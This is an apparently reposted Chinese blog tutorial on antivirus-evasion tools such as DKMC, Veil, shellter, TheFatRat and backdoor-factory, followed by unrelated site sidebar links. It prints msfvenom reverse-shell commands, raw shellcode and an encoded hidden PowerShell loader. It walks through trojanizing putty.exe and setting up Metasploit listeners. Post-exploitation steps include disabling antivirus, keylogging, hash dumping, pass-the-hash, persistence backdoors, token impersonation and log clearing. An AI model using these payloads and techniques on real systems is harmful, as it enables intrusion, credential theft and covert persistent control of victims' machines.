免杀工具汇总

摘要:
今天,我整理了以前的笔记和工具。这些工具虽然没有白莉使用的那么稳定,但在一定程度上也能起到免费杀人的作用。

今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。

DKMC

项目地址:
https://github.com/Mr-Un1k0d3r/DKMC
 
可以创建一个 outputs 文件夹 存放 shellcode
免杀工具汇总第1张
启动
python dkmc.py
免杀工具汇总第2张
操作顺序:
Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码
Gen :是将其 msf 的 shellcode 注入到 BMP 图片中
Ps :将其 BMP 的图片转换为 powershell 代码
Web :将其开启 web 功能
 
第一步,先生成原始的 shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk
免杀工具汇总第3张
第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出
免杀工具汇总第4张
xdbxc3xb8xa4x85xc1x7dxd9x74x24xf4x5ex31xc9xb1xbbx83xeexfcx31x46x15x03x46x15x46x70x7fxa8x6bx01xd8x8exb0x2fxacx14xc2x8fx64x9cx9bx84xf4xf1x27xd5x8dx1cxd4x61x63xfdxfaxbax23xe1xb9xc7xebx94xb7x28x3cxd4xb1x88x12x39x15xcax37xcbxd2x6ax10xf9x60x8dx08xaax69xb2x5ex4bx1fx16x2cx74x50xb2xd7x88xe7x21x13xd6x29x40x06x24xfcx02x4cx8ax77x1fx5fxf5xedx47xb7x38x63xafx2ex6exbex22xedxa5xf8x61x8bx17x19xb7x46x63x28x96x73x70x94x93x44xcfxe5x92x68x34x2fx1fx61xaaxa2x87x79x29x9bxe3x59x3ax62xe1xf2x0fx3dxfcx5fxecxc5xeexe2xc1x56x38x1bx76x98x5exd4x02x92x81xd4x25xf0x46x68x67x2axc6x9dxf7x9bxf8x0cx35xcaxbbx48x70xe1x26x06xcex46x48x6dx34x99x1exa3x52x70x4dx41xa3x68x8fx4ax60x27xb5x21x74x76x82xf3x7dx58x5dxd6x07x6ax86xc2xaax72xd2x60xeex7fxadx3fx7dx3fxd1x7ax39xcdx5bx04xc2xc7x1cx28xbex89x5cxa9x9fx51xf7x7dxeax26x87x33x3dx96xb2x20x7fx30x92x72xc7x0cx03x5dxbaxebxd2x09x58xfbxfdxdexe1xf3xf3xa2x62xa5xeex2axebxcdx38xe9xb9x2dx51x98x79xaex85x25x1bxd9x08x95x86xb9xb6x31x7bx87xf5x56x8axd7x6fxddx79xb7x37xb0x27xebxdexdcx9bxaax59xccx0ex3fx9dxe6xc6x17x51x5ax87x4cxb9x43xa3xb2x55x83x0bx8axdbxa9xf8xeex3exf3xd3x5dxb4xf8x96x68x9fx1cx92xadx59x2cx56x0axeex5axf7x74x98x23xcexa1x4fxadx06xa4xddxa4xa8x18x45xe9x62x32x9dx14x6cxb7x4dx5ax0dx81xe2x3exbcx27x05xfcx60x25xc9xb9x96x57xccxefxa3x27x30x31xa8x5bxdax0fx13x28x6fx4ex69x4ax5cx99x31xd1xcfxa6x27x8fxd6xd0xc2xe4xf6x36xb8xefx63x81xf4xedxacxe3xa0xbax63x94x73x18xcfx9dx6cxe4x9dx75x2bxb2xeaxe2xb7xfex15x95x18x1fx25xfax66x50x2ex70xd8xf2x31xdfx93xe6xe0xfdx04x4fxc6xc9x4axb6xecx69x2axa5x13x9dx54x5ex5ax99xc0x23x49x31x96x6ex5fx87xa0x6dx6cx02x0fxa5x61xb7x8cx2fx94x6fx53x4excfx53x81xcdx87xa9x1axa5xe2x6exfcx0bxb7x01x4cxb1xdfx72x51xbexb2x39x70xe4xcfx12x45x79xc1x5exb4xa3xfax5dxc5x96xe8xacx28x5axd8xefx0ax12x4ex8fxabxb2x65x64x3dxa3xe5x61xf9x9fxe0x97x66x0bx44x9exc6xeex85xb6x5excex86xd7x52xc9x63x57x88x9dxddx07x37x6bxfbxb6x97xa3x8fx24xeax48xc5x6fxe9x93x3cx56xf9xd9x3cx90x59x7dx8exa4x47xc2x58xf5xa8xe4xdex82x0cx63xd2xebxbbxd0xe6xf0x82x2bx1exd0xefxb0x61xdbx39x01x61x32x31x1ax47x32xf1x72x68x20x7bxcdx1ax71x60xa5x32xd1x7bxccxe2xd3xa3xa0x5ax7dx44x1axecx48xc6x2bxb0x66x1axb1x84x59x62x88x49xa6x94xfcxc3xd2xebx7ax21xc6xacx01xb5xe7x65xe9xb2x12x31xf0xddxfex61x4axcaxebx03x90x3fxf4xdax88x51xbexe6x4dx3ex2dxf5x9fxb3xbcx06x92xbex8axc0xcax76x33x01x11x73xf8x1dx21xabx44xc2xfcx6ex2fxa6x8fx51xa0x94x63xcex02x69x0bx37xcaxa5x3ex90x3bx9ax10x2fxdbxcex4cxe1xd2xbb
 
第三步,启动 gen 功能,将 shellcode 注入到图片中,设备图片位置和 shellcode 参数,
免杀工具汇总第5张
output 文件夹下生成一个注入 shellcode 图片,exit 退出到菜单界面
免杀工具汇总第6张
 
第四步,将图片转换成 powershell 文件,保存成为 dk.ps1 格式
set url http://127.0.0.1:8080/output-1564457376.bmp
run
免杀工具汇总第7张
powershell.exe -nop -w hidden -enc JABoAGsAYwByAGEAbABsAEQAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATABPADgAUAAxADAAQwAvAHoARQAxAE4AagBRADAATgBUAGcAeABOAGoATQB1AE8AVABVACEAdABWAFoAdABiAHgAbwA1AEUAUAA0AGUASwBmAC8AQgBxAGwAYgBhAFgAVwBuAFoAawBKACEAMgBFAFYASwBsAEUAUABMAFMAWAAhAHIAbABJACEAbAAzAFIAMQBGAGwAZABnAGQAdwA2AHIAVQBYADIANQB1AEUATgB2AG4AdgBOADEANQAyAGcAUwBpADAAVABYAFcANgA1AFEATgArAG0AYgBGAG4AbgBuAG4AOAAyAEUANwBTADcANAAvAEkAZQAzAEwAawBiAG0AKwBOAE0AeABFAFoASgBnAFgAaABZAGsAYQArAGIAMgArAFIANAB1AHQAUQBSAFIAUABpAE8AWABkAFUAZgBVAGwAawBuAEgARQBJAFMATgA1AEoAbABZAHcAZwB6AGgAVAA0AEsAMgBNAEgAegBKADkAdABYAE4AIQBiAE4ATgBMADAAUgBDAGEAVQBpAFcARwA5ADMAcwB5AFUAIQBtAEUAVwAvAGYAIQBjAFQARQBOAHIAUwBFAGEAYwBnAGYAWgA4ADgAawBqADYAVQAxAEIAUQArAFQAUwA2AGgAYwBpAFEANwA4AFQANQBFAHAANQB6AE8AYQBLADgATQBKAHMAMwBhAFQAUQBGAFUAbQBtAEkAMgBNADUAOQBsAEIARwAxAGcAWQBhADkAbABEAFAAagB1AFoAOAAvAHUALwA2AGcAcwBqAHMATQBUADIAYwBaADUAZABwAHoAZQAzAE4AdABJACEAbABqAHoAbAAyAGYAUABQAGwAMgB3ADYAdAA1AEMAcAA3AGIAWQBwAEcAUwBXAG8ANQBOADIARwBlAGkAdABoAGQAZQBDADAAMwBIADAATQBiAFYANwBxACEARgBaAGkAcABqADcAVwBJAHkAcQAzAFEAVQBtAEUAeQBKAFIAVgBaADIAbQBZAFcAUgA1ADIASwB6AGcAOQBrADMANABsAGkAQgBSAHAALwB3AFEAdAB6AEoAcgArACEANQBJAHUATQA4AEkARQBmAGUAbwBJAGkAaABtAHcAbgBEAEUAcwBCADUAIQAwAHEAbQBQAFYAQgAzAEwAIQBJAGQAZgBxACEAaQA1AHQAQwBGADgAZABCAHIAdwAzADIAWgArAG0AdQBkAHYASABVAG4AdABPAG8AWQA1AFEAZABZAG8AZwAxAGgAdAB2AEsASwBMAFQAeABkAC8AMgBXAGcAYQAyAFgAMQA4AFgAdABSAFcAbwBUAGoAeQBTAEsAeQBaAE0AZgBrAE0AdAAzACEAagB0AFYAIQArAFEAMwB5AEcAYwAhAE0AdgBJADcAVQBMAFAAZAA5AFQANgBvAEIAYQBXAEUAcwAxAEUAZwAxAHgANgA1AHoAcABUAEwAdwBoADIAUgBnADYAegBNAFkARABvAGwAegBPAFYAYgBaAGoAUQB4AGUAdQA5ADUAdQA2AFkAeQB1AHIAZgBQAGIATAB2ADkANwBsAGgATgA2AGMAQwBOAFoAUABGAHkAdAA4AHEAeQBxAHoAdQBUADYANABWAHMAMwB1ADQAbQBzADQAWQA5ADUAZQBnAEoAagBKAHUAQgBrAEwAbQBqAEMAbwBwAEsASwAzAHEAWgA2AHcAWgBoAEQAagBrADUAWQBtAHIAVQB4AFYATQA4AHQASgBpACEAKwAhAFEANABUAGEAbQB3AEYAIQBqAEoANAA2AFgAYQBhAE0ATABQADAAUABjADQAWQBqADAARQAxAEkAcQB5ADUAeABxAGkAUQBEAHYANwB6AFkAQgBaAEYAOQBkAHcATAAwAFkASQBFAGsAVgB6ADAAWABTAHoAZQBHACEAOAAhAGwATgBZAEYANgBlAGYAbAA3AHIAYQBQAFIAbQA2AFQAVQA2ADAARAAwAHMAbgB3AEIARQBZAEIANgBRAEgAbABFACEAZQBrAEkAVABRAHIAcABoAHEAWgBrAFgAbgBUAFgAWQBYAGIAeQByAGgAaABFAGQAVwBtAFgARwA3AG8AYgA0AEMAMAAyAEwAbwBwAGgAVABZAHEAaQA3AEQATwBDAE0ATgBWAEwANABXAEkAVQBXADUAUgBDAGMAZwBIAEYAcwBQAHgAdgBNAGMAbQBaAFEAagB1AFIAawB5AGEAbABIAE0AbQBKAHIAagBTAEgAZABZAEUAUgB5AHcAVwBQAFcAUABaAG8AegBEAGEAZwBpAGwAKwAyACEATgB6AGsAYQBRAGMARQByAFQASwBkAGUARwBNADAAdwBtAHEAUQBIAEcASwBjAHMATABSAEMAYwBUAHUAVAA4AEkAdABEADgAegBpAGQARgBpAE0AUwBuAEQAVwBnAHMAWABDADkANwBnADAAIQBiAGwAaAB5AHEARABTAFcATAB5AFgAbgBQAHUAUAAhAFoAVgBDAHMANAB5AHIAcQBhAEMAbwBtAEwAYwA0AGcAaQBWAEMAYgBVAEQAMQBnAGwARQBYAFoAaABsAG8AZwA1AEIAZwBCAGgAUgBMAGcAMgBNAG8AUwBRADkAegA2AHgAbABiAHcASgAhAEoAbAB0ADkAcgBiAHEAdQBaAFgARgBCAFgAdgBtAHMAdQB1AE4ASAB4ADMATgBpAHoANgBFAFQAOQBzAHoASAByAEgARgBzADEAZgA4AG4ANQBJAG8AdwBtAGEAcgBnAHcAUwBEAGgANQBMADcAaQBrADgAUQBrADEAMQBIAHMAegBOAFMAYQB0ADcAKwB6AHMANwBoADIARQBWAGYAegB0ADEAZwArAHIAaAA5AFUAZABtAFoAawAwAE0ANQBYAGQAdAArAC8AMgA5ADkAOABlADEAIQA3AGUAaABhAE0AawBmAFoATwBmAFQARwBjACsANgAvAEMAcgAwAFgAUQB0ADQAQgArAEoAWQBJAHMAcQBQAGEAVQBjAGcAMABkADEASwA2AGwANABKAHQAVgBaAEkAVgAhAGQAeQBhAHkASAA1ADkAbAByADcAQwBzAG8AIQBSAHkAVgBIAHUAKwBDAHMAbQB3AE4AegBtAFYAawA1AGQASQBxAEcAUwByADEAUQBqACsASAB5AE0ARgByAGIATgBiADIATgByAFoAOABzAGoAVAAwAFYAeQBwAGEARAB0AFgAcgAvADIAQwBNAFMASQBFAEMAcwB2ACEAagBpAEkAbQBaAEIAdABXAEgAVwByAFcASwBrAGwAZAA5ADIASwAvADYAcQB4AEwAKwBPAHIAVwBtAFQATwBkAGUAdQBWAHAAZwBWAGIATgBFAGEARwAwAFQAbgBtACsAeQB3AEUAOQAzAGUANQBmAC8ASwAzAGcARgBIADYAZgA0AEYALwA4AEMAdgBOAFgAWQBUADIAWgBmAEIAVwBnADEAVwBLAGIAOQBZAHUAYgA1AHcARwArAGgAKwA3AHUANQA5AHkAawB6AGEATgBoAEQATgBlAEsAdwBPACEAWQBiAEkAUwBpAG8AcwBuAGIATAAyAHIASQBnAEMAOABiAEYAWgA5ADgANgBuAC8AIQBJAHQAUABIAHkAMwBkADUAeQBqADIAegBwAEwAcwBaAGsATABXADMATgB2AHUARgBEAEIAMgBiAGsAMABGACsALwBaAGIAVwBoAHkAbABSAHUANQBRAGgAZgBSADYAbQA5AEIAegAyAG4ATAAyACsAZwBjADUAMwA0ADUATwBMADAATAAxAEwAMgB5AEIATwBwAFkAUAA0AE4AWABkAHYARAA1ADUASwBhAFoARgBhAEQAaQBKAE8ALwA4AGgANwBKAFAAZQBhAFIATAAvAEoASQB1AGgAIQBCAFAAbgBvAHEAZgA4AGgAUgByAGkANgAhADEAOABiADYAaAB2AG0AaQAxAGkAMgBmAC8AUgBkAGIAcQBvAE0AeQBKAHcAbwAhACEAIQA9AD0AIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAZwBKAGQAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAaABrAGMAcgBhAGwAbABEAGQALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABnAEoAZAApAC4ASQBuAHYAbwBrAGUAKAApAAoA
免杀工具汇总第8张
 
第五步,开启 web 功能,直接运行即可
免杀工具汇总第9张
>>> web (web)>>> set port 8080 [+] port value is set. (web)>>> run [+] Starting web server on port 8080 127.0.0.1 – – “GET /output-1496175261.bmp HTTP/1.1” 200 –
 
免杀测试
过特征检查,不过行为
免杀工具汇总第10张
 
免杀工具汇总第11张
 
 
 
msf shellcode 生成器和编码器-venom
项目地址:
 
使用:
免杀工具汇总第12张
shellcode 格式 都是以图形化 的方式呈现的,比较直观,悬着对应数字就行了。
免杀工具汇总第13张
输入 反弹 地址 lhost 和 端口 lport
免杀工具汇总第14张
 
免杀工具汇总第15张
选择 反弹 方式
免杀工具汇总第16张
输入 文件名
免杀工具汇总第17张
shellcode 生成之后 会自动 打开侦听器
免杀工具汇总第18张
 
免杀工具汇总第19张
生成的shellcode 在 /venom/output/ 目录下面
免杀工具汇总第20张
过特征,不过行为,可以实现短时间免杀,需要及时迁移进程
免杀工具汇总第21张
 
 
Green hat pro免杀工具使用
 
项目地址:https://github.com/Green-m/green-hat-suite
 
开始安装:
kali 上 安装:
gem install os apt-get install mingw-w64 apt-get install wine
 
windows上安装:
下载并install.ps1使用administartor权限运行。
安装将持续几个小时,请耐心等待。
 
使用
cd green-hat-suite/
ruby greenhat.rb 启动
免杀工具汇总第22张
 
免杀工具汇总第23张
短时间内天擎免杀,需要及时迁移进程避免被杀。
免杀工具汇总第24张
 
 
TheFatRat 免杀 工具
便捷化payload生成:
免杀工具汇总第25张
 
免杀工具汇总第26张
安装完成后使用fatrat命令启动
免杀工具汇总第27张
完全傻瓜式操作
免杀工具汇总第28张
设置文件名的时候无需加后缀!
免杀工具汇总第29张
 
 
 
avet 免杀 工具使用
 
进入 avet 文件夹内,进入 build 文件夹下,修改 global_connect_config.sh 文件,更改 kali IP 地址,端口 号为 7777,
运行: ./avet_fabric.py
 
 
免杀工具—Veil-Evasion
项目地址:https://github.com/Veil-Framework/Veil-Evasion Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多 数的杀软。
git clone https://github.com/Veil-Framework/VeilEvasion.git
/setup.sh 安装
 
安装veil:
root@kali:~# apt-get update && apt-get install veil
启动veil:
root@kali:~# veil
Veil>: list 查看列表
[*] Available Tools:
1) Evasion
2) Ordnance
Veil>: use 1
Veil/Evasion>: list 查看具体的payload
 
Veil/Evasion>: use 9 使用序号为9的payload
[cs/meterpreter/rev_http>>]: options 查看需要配置的选项
set LHOST 192.168.199.165
[cs/meterpreter/rev_http>>]: generate 使用generate命令生成载荷文件
[>] Please enter the base name for output files (default is payload): backup 指定一个文件名backup
/var/lib/veil/output/compiled/backup.exe 生成的文件位置
 
接下来使用msf创建远程处理器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.199.165
exploit
 
meterpreter> background 后台运行会话
sessions 查看会话详情
search bypassuac
use exploit/windows/local/bypassuac 使用本地提权模块
set SESSION 1
exploit
meterpreter>getuid 查看用户信息
meterpreter>getsystem 获取系统权限
run post/windows/gather/hashdump 获取hashdump
 
veil 启动veil
免杀工具汇总第30张
Main Menu
 
2 tools loaded 两个工具被加载
 
Available Tools: 可利用的工具
 
1) Evasion 规避免杀
2) Ordnance 工具箱
 
Available Commands:
 
exit Completely exit Veil 退出veil
info Information on a specific tool 查看工具详情
list List available tools 列出可用的工具
options Show Veil configuration 显示veil配置信息
update Update Veil 更新
use Use a specific tool 使用一个具体的工具
 
use 使用模块 1·
免杀工具汇总第31张
list 查看该模式下可用的payload
免杀工具汇总第32张
使用payload:use c/meterpreter/rev_tcp 或者use 7
免杀工具汇总第33张
设置反弹连接的ip以及端口
options 查看配置信息
免杀工具汇总第34张
generate 生成payload
输入要生成的文件名是veilshell.exe
免杀工具汇总第35张
veil 会同时生成多种场景的payload
[*] Language: c
[*] Payload Module: c/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/veilshell.exe.exe 生成的可执行程序
[*] Source code written to: /var/lib/veil/output/source/veilshell.exe.c 生成的.c源文件
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/veilshell.exe.rc metasploit源文件
 
对于生成的.c源文件可以进行二次免杀处理,比如使用shellster 将shellcode注入可执行程序中等等。
 
 
 
shellter免杀
Kali Linux下安装shellter:
apt-get update
apt-get install shellter
 
启动shellter
(需要wine环境apt-get install wine32)
 
Kali 64位运行shellter会出错,原因是shellter只支持32位系统
kali linux 64位上安装32位的wine
在终端下输入
dpkg –add-architecture i386
apt-get update
apt-get install wine32
安装会有一个error提示 提示使用apt-get update来修复,那就继续输入apt-get update
apt-get install wine32
OK
 
这里我从百度下载一个putyy来进行测试,把它放在/root/目录下
免杀工具汇总第36张
安装好环境后启动shellter
root@kali:~# shelter
进入shellter控制台
免杀工具汇总第37张
这里有三个选项
A auto自动
M 高级设置
H help
这里我们使用A,PE Target输入exe程序的绝对路径
免杀工具汇总第38张
 
然后需要等待几分钟等待描绘完成
免杀工具汇总第39张
 
此处提示:是否进行注入,我们选择y
免杀工具汇总第40张
 
这里提示使用此处列表提供的payload还是使用自己设置,我们选择使用L
L list
C customs
H help
免杀工具汇总第41张
 
使用List索引1,即meterpreter_reverse_tcp(tcp反弹)
免杀工具汇总第42张
 
 
设置shellcode回连的IP以及端口,也就是我kali的ip和接收的端口8888
免杀工具汇总第43张
 
稍等片刻即可生成带有shellcode的putty.exe程序。
免杀工具汇总第44张
 
然后我们验证免杀效果(这里使用的是天擎的云查杀功能对该文件进行扫描无异常)
但是当我们点击程序进行运行的时候会报毒(这里猜测是天擎发现了程需主动回连行为,也就是基于行为的查杀)
免杀工具汇总第45张
然后我们打开msf设置攻击载荷,设置msf监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.199.165(设置本地监听地址)
set LPORT 8888(设置本地监听端口)
exploit
 
免杀工具汇总第46张
 
此时我们运行包含shellcode的可执行程序,并开始攻击
 
可以看到已经接收到了我本机192.168.199.205的会话,不过后续连接被天擎阻断了,
过了几分钟弹出病毒提示。
 
免杀工具汇总第47张
论安装杀软的必要性
免杀工具汇总第48张
 
成功拿到shell
免杀工具汇总第49张
 
免杀工具汇总第50张
 
使用migrate进行进程注入,以保证对目标机器的持续控制,
只要tasklist进程不中断,meterpreter就不会断
免杀工具汇总第51张
 
监听键盘输入记录,或自动将结果保存到txt文件中
免杀工具汇总第52张
 
新开一个终端,切换到/root/.msf4/loot下查看键盘记录信息,完美记录!
免杀工具汇总第53张
获取用户名以及密码的hash
免杀工具汇总第54张
 
新开msf使用hash进行登录
免杀工具汇总第55张
免杀工具汇总第56张
 
OK,登录成功了
免杀工具汇总第57张
 
抓包并保存为cap文件,可以使用wireshake打开查看
免杀工具汇总第58张
 
收集系统信息
免杀工具汇总第59张
 
持久控制,设置后门每50秒外连一次
免杀工具汇总第60张
 
免杀工具汇总第61张
 
重启服务器,后门开机启动,成功回连我们kali的1111端口,成功拿到shell
免杀工具汇总第62张
 
针对服务器的持久控制
首先生成一个shellcode,并将其上传至服务器
免杀工具汇总第63张
免杀工具汇总第64张
安装服务器后门程序,然后删除shell.exe(相当于在服务器生成了msf服务了)
免杀工具汇总第65张
 
进行监听设置
免杀工具汇总第66张
 
 
 
Insanity 免杀
git clone https://github.com/4w4k3/Insanity-Framework.git
 
安装依赖
cd Insanity-Framework
chmod +x install.sh
./install.sh
 
Cloning:
git clone https://github.com/4w4k3/Insanity-Framework.git
 
Running:
sudo python insanity.py
 
If you have another version of Python:
sudo python2.7 insanity.py
 
 
后门工具—the-backdoor-factory
原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp到代码段,来触发payload。
安装
或者apt-get install backdoor-factory 安装
 
检测是否支持后门植入
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -S
-f:指定测试程序
-S:检查该程序是否支持 patch
免杀工具汇总第67张
在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
测试裂缝空间size 200
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -c -l 200
-c:code cave(代码裂缝)
-l:代码裂缝大小
免杀工具汇总第68张
查看可注入的payload
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s show
免杀工具汇总第69张
插入payload,并生成文件。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.199.165 -P 4444
-s:选择使用 payload 类型
-H:选择回连服务器地址
-P:回连服务器端口
免杀工具汇总第70张
从返回结果可以看出putty.exe不能导入shellcode,我们使用之前metasploit生成的1111.exe的shell。
root@kali:~/the-backdoor-factory# ./backdoor.py -f /root/1111.exe -s iat_reverse_tcp_inline_threaded -H 192.168.199.165 -P 4444
ok,shellcode注入成功,新文件在backdoored目录下
免杀工具汇总第71张
 
免杀工具汇总第72张
对比原文件与生成文件MD5值
root@kali:~/the-backdoor-factory# md5sum backdoored/1111.exe /root/1111.exe
免杀工具汇总第73张
开启本地监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.199.165
LHOST => 192.168.199.165
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
免杀工具汇总第74张
meterpreter持久控制PC机
进程迁移
run post/windows/manage/migrate(自动查找稳定的进程并切换)
关闭杀软
run killav
查看目标机所有流量
run packetrecorder -i 1
提取系统信息
run scraper
截屏、键盘记录、嗅探、获取域
持久控制
设置后门每50秒外连一次
run persistence -X -i 50 -p 1111 -r 192.168.199.165
run metsvc -A 安装后门
hashdump导出hash利用hash传送漏洞继续扩大战果。。。
免杀工具汇总第75张
 
免杀工具汇总第76张
输入shell进入cmd,创建简单的用户,当然实战中最好使用localgroup中已有的用户提升管理权限
顺便说一下,此处添加用户和将用户加入管理员组操作中使用ad,而没有使用add,主要是为了绕过部分防护软件的策略限制。
免杀工具汇总第77张
假冒令牌
假冒令牌攻击中需要使用kerberos协议,kerberos协议是一种网络认证协议,其设计目的是通过秘钥系统为客户机/服务器应用程序提供强大的认证服务。
使用impersonate_token假冒Administrator进行攻击(注意:用户名前两个反斜杠)
免杀工具汇总第78张
ok,可以看到假冒用户成功,此时就可以通过提升自己的权限在目标系统中进行任何操作了。
 
清除踪迹(清除日志)
免杀工具汇总第79张

免责声明:文章转载自《免杀工具汇总》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇关于 Lua 内存泄漏的检测NodeJS入门--环境搭建 IntelliJ IDEA下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

ubuntu下root用户默认密码及修改方法

【ubuntu下root用户默认密码及修改方法】 很多朋友用ubuntu,一般都是装完ubuntu系统,马上就修改root密码了,那么root用户的默认密码是多少,当忘记root用户密码时如何找回呢,不了解的朋友参考下。 一、ubuntu下root用户的默认密码 默认root密码是随机的,即每次开机都有一个新的root密码。 可以在终端输入命令 sudo...

Jenkins运行shell脚本权限解决办法

在执行脚本加上如下命令打印就可以看 echo "当前操作人" whoami echo "当前目录" pwd解决办法 在Jenkins中运行shell脚本经常遇到权限问题,解决起来非常麻烦,我们索性来个终极解决办法,就是给jenkins一个root权限,这样就不会再遇到权限问题了。 1) vim /etc/sysconfig/jenkins 2) 找到$JE...

oracle 错误 TNS-01190与oracle 登入没反应操作

1,问题描述 [oracle@node2 ~]$ lsnrctl stop LSNRCTL for Linux: Version 11.2.0.4.0 - Production on 20-MAY-2019 09:02:03 Copyright (c) 1991, 2013, Oracle. All rights reserved. Connect...

win7远程连接ubuntu,出现灰屏解决方法

  问题: win7远程虚拟机ubuntu 12.04出现灰色屏幕 打开windows自带的远程桌面连接。输入ubuntu虚拟机的IP地址 可以连接上,输入username和password 点击OK,出现灰色屏幕 解决方法: 1、在虚拟机上的Dash Home搜索Desktop Sharing,并进行如下设置。 若是没有找到,安装GNOME桌...

CentOS系统安全配置

一、账号安全及权限 1.1、禁用root以外的超级用户 1.1.1、检测方法 Cat /etc/passwd 查看口令文件,文件格式如下: Login_name : password: user_ID: group_ID: comment: home_dir: command 若user_ID = 0,则该用户拥有超级用户的权限,查看此处是否有多个ID=0...

浏览器访问svn

文章转自https://www.cnblogs.com/ayanmw/archive/2011/12/19/2294054.html 你看到的这个文章来自于http://www.cnblogs.com/ayanmw 基本的安装包有: subversion /httpd/ svn的httpd的mod_dav_svn mod_authz_svn 两个模块.(...